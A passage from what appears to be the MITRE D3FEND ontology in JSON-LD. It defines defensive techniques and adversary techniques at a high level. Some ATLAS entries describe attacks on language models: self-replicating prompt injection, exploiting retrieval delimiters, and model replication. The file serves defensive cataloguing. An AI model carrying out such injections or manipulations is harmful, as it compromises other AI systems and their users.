      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAPersistenceTechnique"
        },
        {
          "@id": "_:Ne668a61b240041aba595827c419fc326"
        }
      ],
      "skos:prefLabel": "Credentialed Persistence"
    },
    {
      "@id": "_:Ne668a61b240041aba595827c419fc326",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:ConfigurationResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A resource used to configure a system including software and hardware.",
      "rdfs:label": "Configuration Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:LinuxOpenArgumentO_CREAT",
      "@type": "owl:Class",
      "d3f:definition": "Create a regular file.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/open.2.html"
      },
      "rdfs:label": "Linux Open Argument O_CREAT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:NetworkAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkAccessMediation"
      ],
      "d3f:d3fend-id": "D3-NAM",
      "d3f:definition": "Network access mediation is the control method for authorizing access to a system by a user (or a process acting on behalf of a user) communicating through a network, including a local area network, a wide area network, and the Internet.",
      "d3f:isolates": {
        "@id": "d3f:Network"
      },
      "d3f:kb-article": "## How it works\n\nNetwork Access Mediation is a crucial process in telecommunications and IT networks that involves controlling access to network resources. It acts as an intermediary layer between network access requests and the actual network resources, ensuring that only authorized users and devices can access the network.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatIsNetworkAccessControl"
      },
      "d3f:synonym": "Network Access Control",
      "rdfs:label": "Network Access Mediation",
      "rdfs:seeAlso": {
        "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N35c2c120b1554369963d36dda275addc"
        }
      ]
    },
    {
      "@id": "_:N35c2c120b1554369963d36dda275addc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:ComputerCase",
      "@type": "owl:Class",
      "d3f:definition": "A computer case is a computer enclosure which encloses a single primary computer.",
      "rdfs:label": "Computer Case",
      "rdfs:seeAlso": "https://dbpedia.org/page/Computer_case",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:T1641",
      "@type": "owl:Class",
      "d3f:attack-id": "T1641",
      "d3f:definition": "Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.",
      "rdfs:label": "Data Manipulation - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Data Manipulation"
    },
    {
      "@id": "d3f:CWE-1023",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1023",
      "d3f:definition": "The product performs a comparison between entities that must consider multiple factors or characteristics of each entity, but the comparison does not include one or more of these factors.",
      "rdfs:label": "Incomplete Comparison with Missing Factors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:DiskFormatting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskFormatting"
      ],
      "d3f:d3fend-id": "D3-DKF",
      "d3f:definition": "Disk Formatting is the process of preparing a data storage device, such as a hard drive, solid-state drive, or USB flash drive, for initial use.",
      "d3f:kb-article": "### How it works\n\nThis process involves setting up an empty file system on the disk, which includes creating a directory structure and initializing metadata structures. In cybersecurity, disk formatting can be used to remove all existing data on a disk, making it a clean slate for new data storage or to prevent unauthorized access to previously stored data.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices"
      },
      "d3f:modifies": {
        "@id": "d3f:SecondaryStorage"
      },
      "rdfs:label": "Disk Formatting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N06229f17e9e3406eb2931b79b9e5bb6e"
        }
      ]
    },
    {
      "@id": "_:N06229f17e9e3406eb2931b79b9e5bb6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:T1539",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SessionCookie"
      },
      "d3f:attack-id": "T1539",
      "d3f:definition": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.",
      "rdfs:label": "Steal Web Session Cookie",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N37619d8a1b374c748de131918a37b5e7"
        }
      ]
    },
    {
      "@id": "_:N37619d8a1b374c748de131918a37b5e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "d3f:T1175",
      "@type": "owl:Class",
      "d3f:attack-id": "T1175",
      "d3f:definition": "**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**",
      "rdfs:label": "Component Object Model and Distributed COM",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:WebAPIResource",
      "@type": "owl:Class",
      "d3f:definition": "A web API resource is an API resource identified by a Uniform Resource Identifier (URI) and made available from one host to another host via a web protocol and across a network or networks.",
      "rdfs:label": "Web API Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:WebResource"
      }
    },
    {
      "@id": "d3f:Reference-ControlLogix5570and5560Controllers",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://literature.rockwellautomation.com/idc/groups/literature/documents/um/1756-um001_-en-p.pdf"
      },
      "d3f:kb-abstract": "There are five types of ControlLogix controllers available. These types include the following: Standard ControlLogix controllers, Extreme environment ControlLogix controllers, Armor™ ControlLogix controllers, Standard GuardLogix® controllers, Armor GuardLogix controllers. This manual explains how to use standard, extreme environment, and Armor ControlLogix controllers.",
      "d3f:kb-organization": "Rockwell Automation",
      "d3f:kb-reference-of": {
        "@id": "d3f:DisableRemoteAccess"
      },
      "d3f:kb-reference-title": "ControlLogix 5570 and 5560 Controllers",
      "rdfs:label": "Reference - ControlLogix 5570 and 5560 Controllers"
    },
    {
      "@id": "d3f:SessionToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, a session identifier, session ID or session token is a piece of data that is used in network communications (often over HTTPS) to identify a session, a series of related message exchanges.",
      "d3f:kb-article": "## How it works\n\nSession identifiers become necessary in cases where the communications infrastructure uses a stateless protocol such as HTTP. For example, a buyer who visits a seller's website wants to collect a number of articles in a virtual shopping cart and then finalize the shopping by going to the site's checkout page. This typically involves an ongoing communication where several webpages are requested by the client and sent back to them by the server. In such a situation, it is vital to keep track of the current state of the shopper's cart, and a session ID is one way to achieve that goal.",
      "d3f:synonym": [
        "Session ID",
        "Session Identifier",
        "Session Token"
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:Session_ID"
      },
      "rdfs:label": "Session Token",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:T0884",
      "@type": "owl:Class",
      "d3f:attack-id": "T0884",
      "d3f:definition": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.",
      "rdfs:label": "Connection Proxy - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCommandAndControlTechnique"
      },
      "skos:prefLabel": "Connection Proxy"
    },
    {
      "@id": "d3f:Reference-OpenSourceIntelligenceDeceptions_IllusiveNetworksLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10333976B1/en?assignee=Illusive+Networks+Ltd&oq=Illusive+Networks+Ltd+"
      },
      "d3f:kb-abstract": "A system to detect attackers who attempt to breach an enterprise network and attackers who have already breached the enterprise network, including an open source intelligence (OSINT) discoverer scanning the Internet to discover data related to an enterprise that is available online, an OSINT replacer generating deceptive files by replacing placeholders within template files with deceptive information, based on the data discovered by the OSINT discoverer, an OSINT distributor planting the deceptive files generated by the OSINT replacer within designated OSINT resources, and a deception management server that alerts an administrator in response to an attacker attempting to make a connection within the network using information in a deceptive file planted by the OSINT distributor.",
      "d3f:kb-author": "Hadar Yudovich; Nimrod Lavi; Sharon Bittan; Tom Kahana; Tom Sela",
      "d3f:kb-mitre-analysis": "Seems to focus on configuration oriented files to put in decoy hostnames etc. to publish on internet sites, then monitor the decoy \"objects\".",
      "d3f:kb-organization": "Illusive Networks Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "Open source intelligence deceptions",
      "rdfs:label": "Reference - Open source intelligence deceptions - Illusive Networks Ltd"
    },
    {
      "@id": "d3f:PropertyListFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In the OS X, iOS, NeXTSTEP, and GNUstep programming frameworks, property list files are files that store serialized objects. Property list files use the filename extension .plist, and thus are often referred to as p-list files. Property list files are often used to store a user's settings. They are also used to store information about bundles and applications, a task served by the resource fork in the old Mac OS.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Property_list"
      },
      "rdfs:label": "Property List File",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationFile"
      },
      "skos:altLabel": "Plist File"
    },
    {
      "@id": "d3f:AML.T0005.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005.001",
      "d3f:definition": "Adversaries may replicate a private model.\nBy repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.\nThe inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.\n\nA replicated model that closely mimic's the target model is a valuable resource in staging the attack.\nThe adversary can use the replicated model to [Craft Adversarial Data](/techniques/AML.T0043) for various purposes (e.g. [Evade AI Model](/techniques/AML.T0015), [Spamming AI System with Chaff Data](/techniques/AML.T0046)).",
      "rdfs:label": "Train Proxy via Replication - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0005"
      },
      "skos:prefLabel": "Train Proxy via Replication"
    },
    {
      "@id": "d3f:AML.T0061",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0061",
      "d3f:definition": "An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).",
      "rdfs:label": "LLM Prompt Self-Replication - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0061"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "LLM Prompt Self-Replication"
    },
    {
      "@id": "d3f:Modem",
      "@type": "owl:Class",
      "d3f:definition": "A modem -- a portmanteau of \"modulator-demodulator\" -- is a hardware device that converts data into a format suitable for a transmission medium so that it can be transmitted from one computer to another (historically along telephone wires). A modem modulates one or more carrier wave signals to encode digital information for transmission and demodulates signals to decode the transmitted information. The goal is to produce a signal that can be transmitted easily and decoded reliably to reproduce the original digital data. Modems can be used with almost any means of transmitting analog signals from light-emitting diodes to radio. A common type of modem is one that turns the digital data of a computer into modulated electrical signal for transmission over telephone lines and demodulated by another modem at the receiver side to recover the digital data.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Modem"
      },
      "rdfs:label": "Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      }
    },
    {
      "@id": "d3f:In-memoryPasswordStore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A password store held in memory.",
      "rdfs:label": "In-memory Password Store",
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordStore"
      }
    },
    {
      "@id": "d3f:OrchestrationWorker",
      "@type": "owl:Class",
      "d3f:definition": "A d3f:Server which receives commands from a d3f:OrchestrationController to execute workloads.",
      "rdfs:label": "Orchestration Worker",
      "rdfs:seeAlso": {
        "@id": "d3f:OrchestrationController"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OrchestrationServer"
      }
    },
    {
      "@id": "d3f:FileCopyEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is duplicated, creating a new file in a different location or under a different name while preserving the original file's content and attributes.",
      "rdfs:label": "File Copy Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileCreationEvent"
        },
        {
          "@id": "_:N7fc4777beb3d4dd6a16d768fb5252e4e"
        }
      ]
    },
    {
      "@id": "_:N7fc4777beb3d4dd6a16d768fb5252e4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "d3f:RestoreFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreFile"
      ],
      "d3f:d3fend-id": "D3-RF",
      "d3f:definition": "Restoring a file for an entity to access.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Restore File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:N9e2225684476460eb328a106a7abf029"
        }
      ]
    },
    {
      "@id": "_:N9e2225684476460eb328a106a7abf029",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:EmailScanEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an email is inspected or analyzed for content, security, or compliance purposes. Scanning often involves identifying spam, detecting malware, or ensuring policy adherence before delivery or after reception.",
      "rdfs:label": "Email Scan Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EmailEvent"
      }
    },
    {
      "@id": "d3f:IntrusionDetectionSystem",
      "@type": "owl:Class",
      "d3f:definition": "An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. Any intrusion activity or violation is typically reported either to an administrator or collected centrally using a security information and event management (SIEM) system. A SIEM system combines outputs from multiple sources and uses alarm filtering techniques to distinguish malicious activity from false alarms.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Intrusion_detection_system"
      },
      "rdfs:label": "Intrusion Detection System",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "IDS"
    },
    {
      "@id": "d3f:PeripheralHubFirmware",
      "@type": "owl:Class",
      "d3f:definition": "Firmware that is installed on peripheral hub device such as a USB or Firewire hub.",
      "rdfs:label": "Peripheral Hub Firmware",
      "rdfs:seeAlso": {
        "@id": "dbr:USB_hub"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "USB Hub Firmware"
    },
    {
      "@id": "d3f:WindowsVirtualProtectEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Changes the protection on a region of committed pages in the virtual address space of a specified process.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtAllocateVirtualMemory"
        },
        {
          "@id": "d3f:WindowsNtProtectVirtualMemory"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex"
      },
      "rdfs:label": "Windows VirtualProtectEx",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIAllocateMemory"
        },
        {
          "@id": "_:Naeb20e98399b4e358c7eb4ec8dec1121"
        },
        {
          "@id": "_:N921e4a61d36a4702ba7c5dcca20690f2"
        }
      ]
    },
    {
      "@id": "_:Naeb20e98399b4e358c7eb4ec8dec1121",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtAllocateVirtualMemory"
      }
    },
    {
      "@id": "_:N921e4a61d36a4702ba7c5dcca20690f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtProtectVirtualMemory"
      }
    },
    {
      "@id": "d3f:Reference-RFC7208-SenderPolicyFramework-SPF-ForAuthorizingUseOfDomainsInEmail-IETF",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc7208"
      },
      "d3f:kb-abstract": "Email on the Internet can be forged in a number of ways. In particular, existing protocols place no restriction on what a sending host can use as the \"MAIL FROM\" of a message or the domain given on the SMTP HELO/EHLO commands.  This document describes version 1 of the Sender Policy Framework (SPF) protocol, whereby Administrative Management Domains (ADMDs) can explicitly authorize the hosts that are allowed to use their domain names, and a receiving host can check such authorization.",
      "d3f:kb-author": "S. Kitterman",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:TransferAgentAuthentication"
      },
      "d3f:kb-reference-title": "RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email",
      "rdfs:label": "Reference - RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email - IETF"
    },
    {
      "@id": "d3f:FileEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileEviction"
      ],
      "d3f:d3fend-id": "D3-FEV",
      "d3f:definition": "File eviction techniques delete files from system storage.",
      "d3f:deletes": {
        "@id": "d3f:File"
      },
      "d3f:kb-article": "## How it works\n\nAdversaries may place files or programs into a computer's file system to perform malicious actions. As part of the eviction process, these files and programs should be removed to prevent further compromise or reinfection. Examples of malicious types of files are malware which is directly harmful and content files with the intent to deceive users (e.g., phishing.)\n\nOn Windows systems, antivirus (AV) software should be used to safely and permanently remove malicious files. AV software may first quarantine a suspected malicious file, which is the process of moving a file from its original location to a new location and makes changes so that it cannot be executed. Users can then verify that the file is not benign and then permanently delete it.\n\n## Considerations\n\nWhen it is determined that a file should be removed for security purposes, the organization--or systems implementing an organization's policies--may determine that the file should not simply be deleted from the enterprise's mission systems, but be quarantined to a secure system by an approved mechanism, so as to allow follow-up investigation by security staff.\n\nOn Windows systems, deleting a file in File Explorer does not permanently delete a file - it sends it to the Recycle Bin instead. The Recycle Bin must be emptied, or alternative steps must be performed to remove files completely. Even then, in some cases the data may persist in disk, so data shredder tools may be needed to completely wipe a file. Thus, AV tools are recommended.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-HowDoesAntivirusQuarantineWork-SafetyDetectives"
      },
      "rdfs:label": "File Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N77a77627080847b3a0ca778db2aab4e2"
        }
      ]
    },
    {
      "@id": "_:N77a77627080847b3a0ca778db2aab4e2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:EX-0013.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0013.01",
      "d3f:definition": "Here the adversary saturates paths with legitimate telecommands or bus messages so the spacecraft burns scarce resources honoring them. Inputs may be innocuous (no-ops, time queries, telemetry requests) or low-risk configuration edits, but at scale they consume command handler cycles, fill queues, generate events and logs, trigger acknowledgments, and provoke downstream work in subsystems (e.g., repeated state reports, mode toggles, or file listings). On internal buses, valid actuator or housekeeping messages replayed at high rate can starve higher-priority publishers or cause control laws to chase stale stimuli. Because the traffic is syntactically correct, and often contextually plausible, the system attempts to process it rather than discard it early, increasing CPU usage, memory pressure, and power draw. Consequences include delayed or preempted legitimate operations, transient loss of commandability, and knock-on FDIR activity as deadlines slip and telemetry appears inconsistent.",
      "d3f:produces": {
        "@id": "d3f:OTProtocolMessage"
      },
      "rdfs:label": "Valid Commands - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0013/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0013"
        },
        {
          "@id": "_:N9c469961a60f43b6a1eb0d1c4b0ede17"
        }
      ],
      "skos:prefLabel": "Valid Commands"
    },
    {
      "@id": "_:N9c469961a60f43b6a1eb0d1c4b0ede17",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:RegOpenKeyA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyA"
    },
    {
      "@id": "d3f:LinuxCloneArgumentCLONE_THREAD",
      "@type": "owl:Class",
      "d3f:definition": "A flag parameter to the Clone syscall. If set, the child is placed in the same thread group as the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/clone.2.html"
      },
      "rdfs:label": "Linux Clone Argument CLONE_THREAD",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:LinearClassifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LC",
      "d3f:definition": "A linear classifier is a model that makes a decision to categories a set of data points to a discrete class based on a linear combination of its explanatory variables",
      "d3f:kb-article": "## References\nA Look at the Maths Behind Linear Classification. Towards Data Science. [Link](https://towardsdatascience.com/a-look-at-the-maths-behind-linear-classification-166e99a9e5fb).",
      "rdfs:label": "Linear Classifier",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:MultipleRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MRL",
      "d3f:definition": "A supervised learning method that builds a multiple regression model using training data.",
      "d3f:kb-article": "## References\nYale University Department of Statistics. (1997-98). Linear regression and multivariate analysis. [Link](http://www.stat.yale.edu/Courses/1997-98/101/linmult.htm)",
      "rdfs:label": "Multiple Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:MultipleRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:T1562",
      "@type": "owl:Class",
      "d3f:attack-id": "T1562",
      "d3f:definition": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.",
      "rdfs:label": "Impair Defenses",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-Technical_Specifications_for_Construction_and_Management_of_Sensitive_Compartmented_Information_Facilities",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dni.gov/files/Governance/IC-Tech-Specs-for-Const-and-Mgmt-of-SCIFs-v15.pdf"
      },
      "d3f:kb-author": "National Counterintelligence and Security Center",
      "d3f:kb-reference-of": {
        "@id": "d3f:RFShielding"
      },
      "d3f:kb-reference-title": "Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities",
      "rdfs:label": "Reference - Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities"
    },
    {
      "@id": "d3f:AML.T0069.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069.000",
      "d3f:definition": "Adversaries may discover delimiters and special characters sets used by the large language model. For example, delimiters used in retrieval augmented generation applications to differentiate between context and user prompts. These can later be exploited to confuse or manipulate the large language model into misbehaving.",
      "rdfs:label": "Special Character Sets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0069"
      },
      "skos:prefLabel": "Special Character Sets"
    },
    {
      "@id": "d3f:ProcessSegmentExecutionPrevention",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSegmentExecutionPrevention"
      ],
      "d3f:d3fend-id": "D3-PSEP",
      "d3f:definition": "Preventing execution of any address in a memory region other than the code segment.",
      "d3f:kb-article": "## How it works\n\nDuring execution of a process, the instruction pointer register should only point to addresses in a code segment (also called the .text segment), as this is the sole segment which should contain program code.\n\nWhen this technique detects an attempt to execute something that has been designated as non-executable, other techniques such as those in **Process Eviction** might be invoked, such as **Process Termination** to end the current process, or **Executable Blacklisting** to blacklist the potentially vulnerable or malfunctioning executable.\n\n### Software-based implementations\nThe software-based implementation in Windows XP SP2 might not check that every time the instruction pointer is changed, and does not check on each jump or return.  Before calling an exception handler, Windows XP SP2 software-enforced DEP checks whether the exception handler is located in a memory region marked as executable.  If the program was also built with SafeSEH, this implementation also checks before changing control to the exception handler whether it is a registered exception handler in the program's file on disk.\n\n### Hardware-based implementations\nThe NX (No Execute) or XD (Execute Disable) bit on the processor specifies whether a certain part of memory is executable.  Early implementations set this bit by the memory segment, while modern implementations which are built on the flat memory model often store this bit in each entry of the page table, to control execution by the page.\n\n\n## Considerations\n\nNon-hardware process data segment execution prevention is more susceptible to being able to be turned off for a page of memory.\n\nDifferent implementations of this defense have been in place since the 1980s, but implementation stalled when larger 16-bit programs began stuffing code in the segments usually reserved for data. Many modern programs follow the best practice of separation of code and data, are able to run under this defense.\n\nROP or ret2libc/return-to-function attacks could bypass this defense, as although they may pass attacker-controlled data or stack frames to a function, they abuse functions that are legitimately located in the .text segment (code segment) of the program.  For those, more advanced defenses such as a table of valid jump addresses, function call analysis, or return depth analysis could be used.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DataExecutionPrevention_Microsoft"
        },
        {
          "@id": "d3f:Reference-WhatIsNX_XDFeature_RedHat"
        }
      ],
      "d3f:neutralizes": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:synonym": [
        "Execute Disable",
        "No Execute"
      ],
      "rdfs:label": "Process Segment Execution Prevention",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N6af8739411134ca38f1a662ab0abf1bb"
        }
      ]
    },
    {
      "@id": "_:N6af8739411134ca38f1a662ab0abf1bb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:neutralizes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessSegment"
      }
    },
    {
      "@id": "d3f:FileFooterBlockSignature",
      "@type": "owl:Class",
      "d3f:definition": "A sequence of bytes used to identify and validate the footer section within a file.",
      "rdfs:label": "File Footer Block Signature",
      "rdfs:subClassOf": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "d3f:EventLogEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event that captures actions or operations related to the management of system event logs, including modifications, access, and service state changes.",
      "rdfs:label": "Event Log Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/event_log_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N7d135918c27940d08f95d171119ea91a"
        }
      ]
    },
    {
      "@id": "_:N7d135918c27940d08f95d171119ea91a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "d3f:T1636.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.002",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log.",
      "rdfs:label": "Call Log - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Call Log"
    },
    {
      "@id": "d3f:VirtualMemorySpace",
      "@type": "owl:Class",
      "d3f:definition": "Virtual memory is a memory management technique where secondary memory can be used as if it were a part of the main memory. Virtual memory uses hardware and software to enable a computer to compensate for physical memory shortages",
      "rdfs:isDefinedBy": {
